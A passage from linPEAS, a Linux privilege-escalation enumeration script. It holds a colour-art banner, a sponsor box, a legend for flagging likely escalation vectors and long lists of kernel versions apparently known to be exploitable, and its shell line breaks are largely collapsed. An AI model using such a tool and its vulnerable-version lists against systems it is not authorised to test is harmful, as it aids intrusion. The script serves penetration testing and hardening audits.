\e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m
\e[0m
\e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m
\e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m
\e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m
\e[38;2;54;79;47m▀\e[38;2;72;123;60m▀\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[0m\e[38;2;44;65;38m▀\e[38;2;31;48;27m▀\e[38;2;31;48;26m▀\e[38;2;31;52;25m▀\e[38;2;41;71;34m▀\e[38;2;59;97;50m▀\e[0m
\e[38;2;95;106;94m▀\e[38;2;81;137;65m▀\e[38;2;91;166;73m▀\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m
\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[0m\e[38;2;28;50;23m▀\e[38;2;20;22;20m▀\e[0m
\e[38;2;41;52;39m▀\e[38;2;39;76;30m▀\e[38;2;73;136;57m▀\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[0m\e[38;2;53;97;41m▀\e[38;2;24;44;19m▀\e[38;2;36;41;35m▀\e[0m
'"; else echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m
\e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m \e[48;5;108m \e[48;5;71m
\e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m
\e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m
\e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m
\e[48;5;65m \e[49m \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m
\e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m \e[48;5;23m \e[48;5;214m
\e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m \e[48;5;16m \e[48;5;214m
\e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m
\e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m
\e[48;5;65m \e[49m \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m
\e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m \e[48;5;59m \e[48;5;71m \e[48;5;77m
\e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m
\e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m
\e[48;5;77m \e[48;5;65m \e[49m \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m
\e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m
\e[48;5;59m \e[48;5;65m \e[49m \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m
\e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m \e[48;5;108m \e[48;5;107m \e[48;5;59m
\e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m" fi fi } print_support
() { printf """
${GREEN}/---------------------------------------------------------------------------------\\
| ${BLUE}Do you like PEASS?${GREEN} |
|---------------------------------------------------------------------------------|
| ${YELLOW}Get the latest version${GREEN} :
${RED}https://github.com/sponsors/carlospolop${GREEN} | | ${YELLOW}Follow on
Twitter${GREEN} : ${RED}@hacktricks_live${GREEN} | | ${YELLOW}Respect on
HTB${GREEN} : ${RED}SirBroccoli ${GREEN} |
|---------------------------------------------------------------------------------|
| ${BLUE}Thank you! ${GREEN} |
\---------------------------------------------------------------------------------/
""" } ########################################### #-----------) Starting Output
(-----------# ########################################### echo "" if [ !
"$QUIET" ]; then print_banner; print_support; fi printf ${BLUE}"
$SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; echo "" printf
${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC" echo "" printf ${BLUE}"Linux Privesc
Checklist:
${YELLOW}https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist\n"$NC
echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," echo " RED/YELLOW: 95% a PE
vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," echo " RED: You should take a
look to it" | sed "s,RED,${SED_RED}," echo " LightCyan: Users with console" |
sed "s,LightCyan,${SED_LIGHT_CYAN}," echo " Blue: Users without console &
mounted devs" | sed "s,Blue,${SED_BLUE}," echo " Green: Common things (users,
groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed
"s,Green,${SED_GREEN}," echo " LightMagenta: Your username" | sed
"s,LightMagenta,${SED_LIGHT_MAGENTA}," if [ "$IAMROOT" ]; then echo "" echo "
YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed
"s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," sleep 3 fi echo "" printf "
${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC" echo ""
########################################### #---------------) Lists
(-----------------# ###########################################
filename="$SCRIPTNAME.txt$RANDOM" kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+|
4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+|
4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0|
3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8|
3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4|
3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1|
3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6|
3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5|
2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31|
2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23|
2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14|
2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5|
2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29|
2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19|
2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24"
kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual"
kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual"
kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic"
kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic"
kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic"
kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0